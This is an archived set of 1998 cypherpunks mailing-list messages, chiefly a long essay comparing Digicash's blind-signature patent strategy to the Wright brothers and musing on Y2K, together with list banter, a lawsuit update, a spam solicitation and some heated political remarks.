DAY, CHEVY CHASE AND 'CRAZY BOTMA' ARE ABLE TO OFFER YOU 
*UNBELIEVABLE* *DEALS* ON A WIDE VARIETY OF BOTH NEW 
AND OLDER CRIMES.

THIS MAKES IT AN OPPORTUNE TIME FOR *YOU* TO GET INTO 
WHATEVER TYPE OF CRIME YOU'VE DREAMED ABOUT FOR YEARS,
BUT THOUGHT YOU COULD NEVER AFFORD TO PAY FOR.

WE'RE MOVING OLDER MODEL CRIMINALS OUT THE DOOR EVERY DAY,
AND EVEN SENDING FELONY CRIMINALS OUT THE DOOR AT AN EVER
INCREASING RATE, YET WE *STILL* CAN'T KEEP UP WITH THE 
DEMAND OF OUR DC FACTORY TO FIND CUSTOMERS FOR THE NEW
CRIMES BEING CREATED EVERY DAY BY THEIR SOCIAL ENGINEERS. 

WE'RE SO DESPERATE THAT WE'RE WILLING TO PLEAD WITH YOU
TO ACCEPT THE BARGAINS WE ARE CURRENTLY ABLE TO OFFER.

NOT ONLY ARE WE ABLE TO GUARANTEE THAT WE CAN FIT YOU INTO
ANY OF A VARIETY OF THE WIDE SPECTRUM OF CRIMINAL CATEGORIES
CURRENTLY AVAILABLE BUT WE CAN OFFER YOU A DEAL THAT WILL
HAVE YOU BACK OUT THE DOOR IN RECORD TIME.
WHAT'S MORE, DUE TO THE CURRENTLY HIGH RECALL RATE WE ARE
EXPERIENCING AS A RESULT OF SENDING UNSAFE CRIMINALS OUT
THE DOOR, WE CAN PROMISE TO GIVE YOU AN EVEN BETTER DEAL
ON A NEW CRIME IN THE FUTURE, EVEN IF YOU HAVEN'T FINISHED
PAYING FOR YOUR ORIGINAL CRIME.

ONCE WE HAVE FIT YOU INTO A THIRD FELONY CRIME, YOU WILL
AUTOMATICALLY BECOME A LIFETIME CUSTOMER AND ELIGIBLE TO
MOVE FROM OUR 'EASY PAYMENT' PLAN TO OUR 'LIFETIME PAYMENT'
PLAN WHERE WE *INSIST* THAT YOU TAKE *FOREVER* TO PAY FOR
YOUR CRIME.

WITH THE EVER INCREASING ABILITY OF OUR DC FACTORY TO
PRODUCE NEW CRIMES AT AN ASTOUNDING RATE, IT HAS NEVER
BEEN EASIER TO FIT INTO OUR CUSTOMER PROFILE.

        "IF THE CUSTOMER DOESN'T FIT THE CRIME, 
         WE'LL MAKE THE CRIME FIT THE CUSTOMER."
                    THAT'S A PROMISE!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 1 May 1998 11:49:10 -0700 (PDT)
To: Recipient List Suppressed:;
Subject: db$: The Wright Brothers vs. Chixalub
Message-ID: <v04003a05b16fc5894937@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: rah@pop.sneaker.net (Unverified)
Mime-Version: 1.0
Date: Thu, 30 Apr 1998 17:50:18 -0400
To: e$@vmeng.com
From: Robert Hettinga <rah@shipwright.com>
Subject: db$: The Wright Brothers vs. Chixalub
Sender: <e$@vmeng.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@vmeng.com?subject=subscribe%20e$>


--- begin forwarded text


X-Sender: rah@pop.sneaker.net (Unverified)
Mime-Version: 1.0
Date: Thu, 30 Apr 1998 15:26:30 -0400
To: Digital Bearer Settlement List <dbs@philodox.com>
From: Robert Hettinga <rah@shipwright.com>
Subject: db$: The Wright Brothers vs. Chixalub
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

You might notice that the tag on this one says "db$". That's to
differentiate it from my "e$" rants, which might be more general than ones
like this one, which is on digital bearer settlement. I think there is lots
of talk about electronic commerce and e$ these days from whole bunches of
people, and, as a consequence, my interest in it has focused more onto the
issue of digital bearer settlement.  You'll probably be seeing more db$
tags than e$ tags on my rants going forward.

All of which brings me to some obversations I've been making in public
about blind signatures lately, and the excellent time I had at Ed Yeardon's
Cutter Consortium "Summit" conference the past few days.


Let's start with yet another aviation analogy about Digicash, shall we? :-).

Remember, I like to do that.

Once I compared privacy to flight, and said that, like flight, lots of
people had died getting strong cryptography to work, and that privacy
itself was an inherent good. The thing which actually got people to use the
technology, however, was its commercial value. It wasn't the joy of flight
or slipping the surly bounds of earth at Kitty Hawk that got people into
the air, it was coach fare to Dayton. It was digital commerce, and thus
financial cryptography, which created the most privacy. Digital Commerce is
financial cryptography, financial cryptography is strong cryptography, and
all that.

Then there's my analogy of book-entry settlement as Boyle's law (partial
pressure of gasses?) and strong crypto, particularly digital bearer
settlement, as Bernoulli's law, the law describing aerodynamic lift.
Essentially you can think of cryptography and bearer settlement as wings,
and book entries as, well, bags of gas. :-).

Thinking this way, with commerce on the internet as flight, First Virtual
becomes a tethered baloon. Encrypting your First Virtual transaction makes
it an aerodynamic barrage balloon. Encrypting a credit card in an SSL
web-form is flying around on a Zeppelin. And, David Chaum becomes the
Wright Brothers for inventing the airplane. I used to say "Or maybe Otto
Lillenthal" under my breath to get a laugh, but now, I know exactly why
David Chaum is the Wright Brothers.

That's because Digicash *is* The Wright Flying Machine Company, or whatever
the Wright's subsequent enterprise was called. It seems to me that
Digicash's strategy with the blind signature is a dead ringer for the
Wright Brothers' control of the airplane patent. Here's why:


1. In the beginning, nobody believed that the Wright brothers could fly,
and they had to take the airplane to Paris and demonstrate it there before
anyone in the US thought it was true.

Digicash did the same thing. Actually, the NSA created a positively hostile
environment here in the USA for cryptography, financial or otherwise, and
that forced David Chaum to go to the Netherlands, where there was a more
positive reception for his work.

2. Then, nobody could think about what you could do with airplanes, and the
Wrights foundered for a bit..

Same thing with Chaum, Digicash, and the blind signature patent. The
commercial internet didn't exist yet in 1986, and blind signatures were
conceived as useful only in smartcards, which were just being experimented
with. Digicash was going to be used in physical electronic wallets, and
maybe in transponders at the gates of toll roads. The CAFE project was an
example of this meat-space ecash strategy.

It wasn't that Chaum didn't think about the internet. Far from it. He
invented digital mixes, after all, which became the basis for anonymous
remailers, onion routers, CROWDS, and the like. He just didn't look at
blind signatures from the financial operations point of view and see
digital bearer settlement, that's all. He was thinking privacy, and not
financial operations, just like the Wrights were thinking flight, and not
high-speed transportation.

3. The entire time they held the patent, the Wrights only really wanted to
sell airplanes to governments, because they wanted to sell to a few large
stable customers instead of small entities who would probably go out of
business.

Digicash, to this day, tries to sell to big institutions. Their now mostly
internet-driven digital cash stategy is to create the financial equivalent
of Alfred Nobel's dynamite cartel, where one bank in each country gets an
ecash license, hopefully the largest bank possible. Mark Twain in the US
was a proof of concept, if not an act of desperation on Digicash's part,
but it did lead to exclusive (I bet) country-wide licences with Nomura,
Deutchebank, the Swedish Post office, and others. There was talk at FC98
that Digicash received $1 million a month from Deutchebank just for the
*option* on a Germany-wide license. I think they've now exercised that
option. Frankly, I find this geographic, paint-by-the-nation-state approach
quaint in a world of ubiquitous geodesic internetworks, but there it is,
and it effectively prevents other people from doing anything innovative
with blind signatures in the meantime. Monopolies on information
technologies kind of work that way. Dogs and mangers come to mind, and not
for the first time.

4. The Wrights, when they thought about the transportation business at all,
thought about it in terms of "rides" instead of "trips".

Digicash isn't really looking at the applications of their technology to
anything except its original designed purpose, that is, cash. There are
some leaks around the edges, of course.

Nomura seems to be looking at blind signature digital bearer settlement as
a real-time gross-settlement technology, with some kind of private,
kiretsu-cash idea. Digicash people used to give you a shocked "how did you
know that already" look when you talked to them about the painfully obvious
potential use of blind signatures in the capital markets.

However, I'm certain that Digicash thinks that capital market use of blind
signature digital bearer settlement is a pipedream and that they'd better
focus on the main chance, which is ecash. Preferrably electronic
wallet-based ecash issued by a major bank. In competition with book-entry
settlement, in book-entry settlement's own turf. Go figure.

5. Finally, the only innovation in the American aircraft market in the age
of the Wright patent came from that famous airplane "infringer", Curtis,
who didn't give a damn about patents and built airplanes anyway. Much
better airplanes, in fact, which the Wrights eventually took him to court
for, forcing Curtis to merge with the Wrights. Fortunately, European
evolution in aviation continued apace, giving us the aviation equivalent of
the Pre-Cambrian explosion, culminating in the names we all remember from
World War I like Sopwith, Spad, Dornier, and, of course, Fokker.

The problem is that there's no Curtis to infringe on the blind signature
patent, because you can't hook up to the financial system from the internet
-- land yur plane in other words -- without clear rights to use it. The
banks where you move money on and off the net from would get sued. Unless
they're in places like South Africa, where software patents don't matter,
or Russia, where they're probably uninforceable. Places which have their
own problems, not the least of which is poor internet access, poor
financial network connectivity (something like Cirrus on the back end of a
trustee/custodian would be, um, NYCE :-)), and, not least, poor impulse
control by the local force merchants, monopolistic or otherwise. Tax havens
don't even count. The very definition of a tax haven is someplace with a
bandwidth and regulatory gravity well to keep it safe from any kind of
market efficiency.

A return to some kind of "Europe" for that hoped-for explosion of blind
signature evolution could still be happening on the internet anyway.
Certainly, with smart and tenacious people like Ian Goldberg designing
HINDE and Ryan Lackey bashing on a reference version of it, one could
certainly try to argue this, but there's no money doing this stuff right
now (unless you count first-class upgrades to Anguilla or free nights in
the InterIsland), much less something like the First World War to forge
that innovation into a robust replacement for the book-entry economy.


Which, thinking thinking of robustness, brings me to what I've been doing
the last few days. Pete Loshin, former editor at Byte, former writer of
various excellent how-to books on networking and one of the first surveys
of internet commerce (and one of the founding members of the Digital
Commerce Society of Boston, I might add, :-)), is now editor of Cutter
Publications' "Corporate Internet Strategies" newsletter, which used to be
edited by Ed Yourdon, of American Programmer, Y2K, and much other, fame.

So, when they needed someone on a panel about electronic commerce at
Cutter's "Summit" conference at the Boston Harbor Hotel's Wharf Room
facility this week, someone controversial, they said, Pete said he knew
exactly who to throw into the fray.

It was fun, too. There, in front of a room full of senior IT managers from
big companies and Famous Computer Guys, sitting on a panel on Internet
Commerce, was one of Fidelity's Famous Computer Guys himself, now running
their web technology department. And Pete. And Fidelity's retail
web-marketing guy, and me. Fidelity has 900 billion dollars under
management. 60% of their customer interaction now comes from the web. The
ganglia twitch.

Dropping that $100 billion 1997 internet transaction number, and saying
that it was three orders of magnitude over the estimate didn't faze these
guys. They had seen it happen.

In addition, all of the people with websites I talked to said that they
used SSL to interact with their customers. Almost all of them said that
they used 128 bit encryption. The Mssrs. Fidelity faintly crowed about the
fact. Digital Commerce is Financial Cryptography, so what else is new?

Then, of course, I threw the whole geodesic economy, digital bearer
settlement rant at them, right down to the picomoney as processor food,
micromoney mitochondria bit.

And, of course, they all stood up and threw their dinner rolls at me. It
was great.

That's because I'd been throwing my own dinner rolls, and I'd been been
hinting what I was going to say all week. They even encourage you to heckle
the speakers back with a liberal sprinkling of wireless mikes around the
room.

So every once in a while, I'd pop off with comments like intellectual
property control was impossible, that watermarking only told you who the
code was stolen from not who stole it. Or, why not have cash auctions for
programming deliverables instead of top-down project management, Or,
emergent processes for software were always going to beat "controlled"
processes, Or, passing programmer certification laws in the wake of
whatever Y2K thing happened would be impossible to enforce in a world of
those same anonymous cash settled markets for programming talent. I even
pointed them to the forum-hackers list as proof.

One of my favorite gybes while I was up on the podium to the Fidelity
marketing guy -- who's a nice guy but who's also fighting like crazy right
now to drag Fidelity up the "quality service differentiation" ladder
because Fido can't play least-cost-producer anymore in an eTrade world --
was my claim that eventually most so-called "branded" products would be
reduced to graded fungible commodities, and that the more dependant a
business was on information technology, the faster it would happen to them.

Orthogonality is always more fun than the alternative. And you get lots of
free dinner rolls.

And, of course, after the digital commerce panel and lunch, Ed Yourdon
wrapped it all up with his scary Y2K rant, followed by an appropriately
scary bunch of panelists telling us just how scary all theis Y2K stuff
really was, that Ed had gotten himself on down to Taos, complete with his
own water supply, and that denial was when you lied to yourself and
believed it. Or something.

All of which I now believe more of, just because all these grey-haired
programming aristocrats were nodding sagely about this prospect of
impending doom for us all. Frankly, most of the people who've yammered at
*me* about Y2K were either loons who hoped it would All Fall Down Someday
Soon, or people like Vinnie, who think it's a good idea, if not fun, to
know what to do if it ever does all fall down, but that praying for it
wasn't going to make it so. I'd like to think I'm one of the latter. The
other problem is, I've seen the end of the world coming before. Even
predicted it myself on occasion. Haven't been able to reduce it to
practice, yet, though. That's the reason Gibbon's in my .sig these days.


So, let's get back to Digicash and the Wright Brothers. After hanging out
with a whole bunch of top-down monolithic-system gurus and Y2K folks
yesterday, it seems plausible. And, I'm certain there are lots of people
out there who know lots about both and who hope that Y2K will be the
Chixalub event that will burn off all the database-driven book-entry
dinosaur systems and clear the way for a digital bearer mammalian explosion.

Frankly, I think we're looking at a brushfire, if anything. The lawn will
grow back, but the house won't burn, even if the water does go out for a
bit. That's my story, and I'm sticking to it. Remembering, of course, the
above bit about denial.


But, suppose we *are* talking about the financial equivalent of that great
1970's 30-second short film epic, "Bambi vs. Godzilla", where Bambi is
squashed by a giant green foot (oops, I gave away the plot), and the whole
financial system goes away for a few days. Or a month.

Is there any way to step in with digital bearer settlement as a robust
alternative to book-entry funds transfer? Remember the great bank strike in
Ireland, where everyone just passed around nth-party endorsed checks like
they were money until it was all over? Could we do something like that?
Would David Chaum and company let us do that without suing someone for
infringement? Could they stop us, if the courts are full of Y2K liability
cases? Would the internet still be up? Could we pay our ISPs with digital
bearer certificates to keep them up? How about Iridium and Teledesic, which
are supposed to be up by then?

Once again, ganglia twitch. However, it might be fun to game the idea a
bit, just to scare the neighbors. You know, pay ya all back when the banks
come up?

Well, maybe not. Ed says that the banks, and particularly Wall Street, are
the most prepared of any of us. That makes sense. The half life of
financial software these days is measured in months. For instance, one of
NeXT's biggest markets was in the financial sectors, especially trading
rooms, where any prototype which worked was immediately production code.
They liked NeXT, despite all its other interesting charistics, because you
could do exactly that, and faster than any other development environment.
Of course, if anyone's a poster child for "sell Cadillacs, drive a Chevy,
sell Chevies, drive a Cadillac", it's Steve Jobs. Of course, he sold NeXTs
and got Apples, however that turns out...

Still, it might be worth thinking about, trying to route around the
book-entry financial settlement system as a pre-disaster exercise.

Wright Brothers versus Chixalub, and all that. No, I don't wanna see the
movie...

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/




----------------------------------------------------------------------
Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk/                   info@hyperion.co.uk
----------------------------------------------------------------------
Full-Strength Cryptographic Solutions for Worldwide Electronic Commerce
http://www.c2.net/                                   stronghold@c2.net
----------------------------------------------------------------------
Like e$? Help pay for it!
For e$/e$pam sponsorship or donations, <mailto:rah@shipwright.com>
----------------------------------------------------------------------

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 1 May 1998 13:54:27 -0700 (PDT)
To: lawya@lucs-01.novell.leeds.ac.uk
Subject: Ruling in Payne & Morales v NSA's Minihan
Message-ID: <354A351C.20B8@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday 5/1/98 2:15 PM

John Young

Nice to talk to you a few minutes ago.  Even in person!

Judge Santiago Campos ruled in Payne and Morales v NSA 
Minihan. http://jya.com/whpfiles.htm  
http://www.aci.net/kalliste/speccoll.htm

Morales opted to meet and open the ruling even though it is
a week end.  Usually, I NEVER open a lawyer letter on near a 
weekend or a vacation.

But we do file lawsuits on Friday.  That way we get to blast THEM
[Great Satan supporters] on the Infobahn before the court has a 
chance to seal the complaint.  

Mail Boxes Etc. charges only  $.04 per page special copy charge on 
Fridays too V $.07 on other days.  

We, unlike DOE, are mindful of containing litigation costs.

The ruling is 56 pages long!

Morales read me only the first and last pages.

	1  We DID NOT LOSE
	2  NSA did not win
	3  We are not headed for jail

I mailed a priority mail copy to you.

Without Internet NYA, J Orlin Grabbe, and some really neat journalists
the
outcome would have far different, I conjecture.

Have a good weekend everyone [http://www.wpiran.org/].  We are!

We GOT TO GET THIS HORRIBLE MESS SETTLED!

Cowabunga, Yahoo, allahu akbar, etc.
bill and art






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: yq91sa9Up@aol.com
Date: Fri, 1 May 1998 14:58:19 -0700 (PDT)
Subject: Master Wealth Builder......
Message-ID: <EEZt46thY3v8W8>
MIME-Version: 1.0
Content-Type: text/plain



 If You Qualify, You Could Net
 Yourself Well Over $150,000
 By The End Of 1998... Guaranteed!

 Greetings:
 My name is Marty. I would like to ask you to please take
 two minutes of you time to read the following. If you
 don't like what you see then please trash this mail and
 accept my apologies for this disturbance. I promise
 you I will not send you another. I am writing to
 introduce you to a strong, wealth building home based
 business that is NOT a Multilevel Marketing venture or
 some get "rich quick scheme"... a business that is more
 profitable than any network marketing, direct sales,
 franchise or investment opportunity in existence today.

 Who Will Be Allowed To Work With Me?

 I am looking for a limited group of serious minded
 entrepreneurs that have been looking for a solid
 business opportunity. I'm not looking for a huge
 response. I only want to work with people I feel have
 a "burning desire" to be successful. Can you visualize
 yourself earning $30,000 + net per month within the
 next year, if provided with the right opportunity to
 do so? Are you willing to commit to doing whatever it
 would take to be successful in this business once you
 completely understand it?

 How To Find Out If You Qualify

 To find out more, call toll free for more details:
  1-800-600-0343 ext.#1399. This is a recorded message
 that is available 24 hours a day. It is NOT a
 telemarketer. I am selecting individuals on a first
 come, first serve basis. If you are seriously
 interested...REPLY NOW! If you don't really feel
 you've got the right stuff to be successful, then
 please don't bother to respond. I only want to work
 with the motivated people who seriously want to make
 insane amounts of money!

 If I have reached you in error, please send mail with
 REMOVE in the subject heading and you will be
 immediately removed from subsequent mailings.

 Prosperous Regards,

 P.S. Once again, this is NOT MLM. Serious inquiries
 only please! You will work 100% from your phone. Age,
 appearance, skills, location, and transportation are
 NOT important! Only desire and commitment are important!

           1-800-600-0343 ext.#1399   DAY OR NIGHT







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Loftus <cel4538@ritvax.isc.rit.edu>
Date: Fri, 1 May 1998 13:05:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: How do I get off this list??
Message-ID: <3.0.32.19980501160520.006cd8d0@vmspop.isc.rit.edu>
MIME-Version: 1.0
Content-Type: text/plain


There is too mach crap.  how do I get off?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 1 May 1998 13:05:51 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: Reno reports "suspicion" in industry crypto-negotiations
In-Reply-To: <199805011541.RAA23552@basement.replay.com>
Message-ID: <v03007804b16fe9a24748@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:39 -0400 5/1/98, John Young wrote:
>Weren't some of these stalking drafts nearly liberated recently?
>Or were they only floated for trusted eyes only?

They were floated for TEO: ACP, Hill staffers, and allied groups like CDT
(Alan Davidson from CDT, after a Cato forum yesterday, defended much of the
ACP crypto bill when I asked him about it).

I got a leaked copy. I promised to send around a summary and haven't yet.
Too much time on Y2K and Microsoft. I'll get to it this weekend.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 1 May 1998 15:41:42 -0700 (PDT)
To: Chris Loftus <cel4538@ritvax.isc.rit.edu>
Subject: Re: How do I get off this list??
In-Reply-To: <3.0.32.19980501160520.006cd8d0@vmspop.isc.rit.edu>
Message-ID: <199805012241.SAA26940@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.32.19980501160520.006cd8d0@vmspop.isc.rit.edu>, on 05/01/98 
   at 04:05 PM, Chris Loftus <cel4538@ritvax.isc.rit.edu> said:

>There is too mach crap.  how do I get off?

Sorry you have failed the requisite IQ test for obtaining the
unsubscription information. 

You are now doomed here forever!!!

Welcome the Purgatory, Hell is on the way.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: How do you make Windows faster?  Throw it harder!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNUpQhI9Co1n+aLhhAQGmFgP8D1kzv4i2mPV/cD6o+V70hoftPDGIwAof
pP6qbuaPcw6Hc9NYcXNiY9s3EjuHviE2rwF5Vw3+a/swZxOeTIUUg5Fcf2VTvh0R
KR7WUJ+bqxp5no5ribCsl3ADGSVCNv9mwa2GX3269qf1D3hijabRzv3L0aRNVYNp
G6isqgJDuTM=
=Zo9G
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 1 May 1998 18:13:45 -0700 (PDT)
To: TruthMonger <cypherpunks@toad.com
Subject: Re: Constitution For Sale
In-Reply-To: <354A256F.4030@algebra.com>
Message-ID: <v03130308b17021e9a532@[209.66.100.83]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 PM -0700 5/1/98, TruthMonger wrote:
>CONSTITUTION FOR SALE
>_____________________
>
>1776 Constitution for sale. Inherited from original owner.
>Hasn't been used for years, but can be easily restored to
>its original condition by extermination of the rats which
>have taken up residence under the hood and the removal of
>useless accessories which were added by a long series of
>unethical mechanics who saw the prospect of making more
>money if it continually drifted to the right or the left
>than if the integrity of its original design was retained.
>Truly must be seen to be appreciated.
>Must be appreciated to be truly seen.

Wow! I haven't seen a Real Copy, ever!  I was once a high school field trip
to the National Archives, circa 1968, but our teachers told us the
Constitution was now classified as a subversive document. It had been on
the Index since 1933.

Maybe the extermination of the rats under the hood will be accomplished as
a side effect of the Y2K problem.

We ought to urge our fellow sheeple to have _short trials_ for the millions
of rats we need to exterminate. After all, they can't exactly appeal to the
Supreme Court if the Supremes preceded them to the gallows, can they?

--Tim May


"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 2 May 1998 05:47:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: db$: The Wright Brothers vs. Chixalub
Message-ID: <v04003a1eb170a96dd4a8@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain


Just to fan the flames of Y2K hysteria ever higher...

;-).

Cheers,
Bob Hettinga

--- begin forwarded text


X-Sender: rah@pop.sneaker.net (Unverified)
Mime-Version: 1.0
Date: Thu, 30 Apr 1998 17:50:18 -0400
To: e$@vmeng.com
From: Robert Hettinga <rah@shipwright.com>
Subject: db$: The Wright Brothers vs. Chixalub
Sender: <e$@vmeng.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@vmeng.com?subject=subscribe%20e$>


--- begin forwarded text


X-Sender: rah@pop.sneaker.net (Unverified)
Mime-Version: 1.0
Date: Thu, 30 Apr 1998 15:26:30 -0400
To: Digital Bearer Settlement List <dbs@philodox.com>
From: Robert Hettinga <rah@shipwright.com>
Subject: db$: The Wright Brothers vs. Chixalub
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

You might notice that the tag on this one says "db$". That's to
differentiate it from my "e$" rants, which might be more general than ones
like this one, which is on digital bearer settlement. I think there is lots
of talk about electronic commerce and e$ these days from whole bunches of
people, and, as a consequence, my interest in it has focused more onto the
issue of digital bearer settlement.  You'll probably be seeing more db$
tags than e$ tags on my rants going forward.

All of which brings me to some obversations I've been making in public
about blind signatures lately, and the excellent time I had at Ed Yeardon's
Cutter Consortium "Summit" conference the past few days.


Let's start with yet another aviation analogy about Digicash, shall we? :-).

Remember, I like to do that.

Once I compared privacy to flight, and said that, like flight, lots of
people had died getting strong cryptography to work, and that privacy
itself was an inherent good. The thing which actually got people to use the
technology, however, was its commercial value. It wasn't the joy of flight
or slipping the surly bounds of earth at Kitty Hawk that got people into
the air, it was coach fare to Dayton. It was digital commerce, and thus
financial cryptography, which created the most privacy. Digital Commerce is
financial cryptography, financial cryptography is strong cryptography, and
all that.

Then there's my analogy of book-entry settlement as Boyle's law (partial
pressure of gasses?) and strong crypto, particularly digital bearer
settlement, as Bernoulli's law, the law describing aerodynamic lift.
Essentially you can think of cryptography and bearer settlement as wings,
and book entries as, well, bags of gas. :-).

Thinking this way, with commerce on the internet as flight, First Virtual
becomes a tethered baloon. Encrypting your First Virtual transaction makes
it an aerodynamic barrage balloon. Encrypting a credit card in an SSL
web-form is flying around on a Zeppelin. And, David Chaum becomes the
Wright Brothers for inventing the airplane. I used to say "Or maybe Otto
Lillenthal" under my breath to get a laugh, but now, I know exactly why
David Chaum is the Wright Brothers.

That's because Digicash *is* The Wright Flying Machine Company, or whatever
the Wright's subsequent enterprise was called. It seems to me that
Digicash's strategy with the blind signature is a dead ringer for the
Wright Brothers' control of the airplane patent. Here's why:


1. In the beginning, nobody believed that the Wright brothers could fly,
and they had to take the airplane to Paris and demonstrate it there before
anyone in the US thought it was true.

Digicash did the same thing. Actually, the NSA created a positively hostile
environment here in the USA for cryptography, financial or otherwise, and
that forced David Chaum to go to the Netherlands, where there was a more
positive reception for his work.

2. Then, nobody could think about what you could do with airplanes, and the
Wrights foundered for a bit..

Same thing with Chaum, Digicash, and the blind signature patent. The
commercial internet didn't exist yet in 1986, and blind signatures were
conceived as useful only in smartcards, which were just being experimented
with. Digicash was going to be used in physical electronic wallets, and
maybe in transponders at the gates of toll roads. The CAFE project was an
example of this meat-space ecash strategy.

It wasn't that Chaum didn't think about the internet. Far from it. He
invented digital mixes, after all, which became the basis for anonymous
remailers, onion routers, CROWDS, and the like. He just didn't look at
blind signatures from the financial operations point of view and see
digital bearer settlement, that's all. He was thinking privacy, and not
financial operations, just like the Wrights were thinking flight, and not
high-speed transportation.

3. The entire time they held the patent, the Wrights only really wanted to
sell airplanes to governments, because they wanted to sell to a few large
stable customers instead of small entities who would probably go out of
business.

Digicash, to this day, tries to sell to big institutions. Their now mostly
internet-driven digital cash stategy is to create the financial equivalent
of Alfred Nobel's dynamite cartel, where one bank in each country gets an
ecash license, hopefully the largest bank possible. Mark Twain in the US
was a proof of concept, if not an act of desperation on Digicash's part,
but it did lead to exclusive (I bet) country-wide licences with Nomura,
Deutchebank, the Swedish Post office, and others. There was talk at FC98
that Digicash received $1 million a month from Deutchebank just for the
*option* on a Germany-wide license. I think they've now exercised that
option. Frankly, I find this geographic, paint-by-the-nation-state approach
quaint in a world of ubiquitous geodesic internetworks, but there it is,
and it effectively prevents other people from doing anything innovative
with blind signatures in the meantime. Monopolies on information
technologies kind of work that way. Dogs and mangers come to mind, and not
for the first time.

4. The Wrights, when they thought about the transportation business at all,
thought about it in terms of "rides" instead of "trips".

Digicash isn't really looking at the applications of their technology to
anything except its original designed purpose, that is, cash. There are
some leaks around the edges, of course.

Nomura seems to be looking at blind signature digital bearer settlement as
a real-time gross-settlement technology, with some kind of private,
kiretsu-cash idea. Digicash people used to give you a shocked "how did you
know that already" look when you talked to them about the painfully obvious
potential use of blind signatures in the capital markets.

However, I'm certain that Digicash thinks that capital market use of blind
signature digital bearer settlement is a pipedream and that they'd better
focus on the main chance, which is ecash. Preferrably electronic
wallet-based ecash issued by a major bank. In competition with book-entry
settlement, in book-entry settlement's own turf. Go figure.

5. Finally, the only innovation in the American aircraft market in the age
of the Wright patent came from that famous airplane "infringer", Curtis,
who didn't give a damn about patents and built airplanes anyway. Much
better airplanes, in fact, which the Wrights eventually took him to court
for, forcing Curtis to merge with the Wrights. Fortunately, European
evolution in aviation continued apace, giving us the aviation equivalent of
the Pre-Cambrian explosion, culminating in the names we all remember from
World War I like Sopwith, Spad, Dornier, and, of course, Fokker.

The problem is that there's no Curtis to infringe on the blind signature
patent, because you can't hook up to the financial system from the internet
-- land yur plane in other words -- without clear rights to use it. The
banks where you move money on and off the net from would get sued. Unless
they're in places like South Africa, where software patents don't matter,
or Russia, where they're probably uninforceable. Places which have their
own problems, not the least of which is poor internet access, poor
financial network connectivity (something like Cirrus on the back end of a
trustee/custodian would be, um, NYCE :-)), and, not least, poor impulse
control by the local force merchants, monopolistic or otherwise. Tax havens
don't even count. The very definition of a tax haven is someplace with a
bandwidth and regulatory gravity well to keep it safe from any kind of
market efficiency.

A return to some kind of "Europe" for that hoped-for explosion of blind
signature evolution could still be happening on the internet anyway.
Certainly, with smart and tenacious people like Ian Goldberg designing
HINDE and Ryan Lackey bashing on a reference version of it, one could
certainly try to argue this, but there's no money doing this stuff right
now (unless you count first-class upgrades to Anguilla or free nights in
the InterIsland), much less something like the First World War to forge
that innovation into a robust replacement for the book-entry economy.


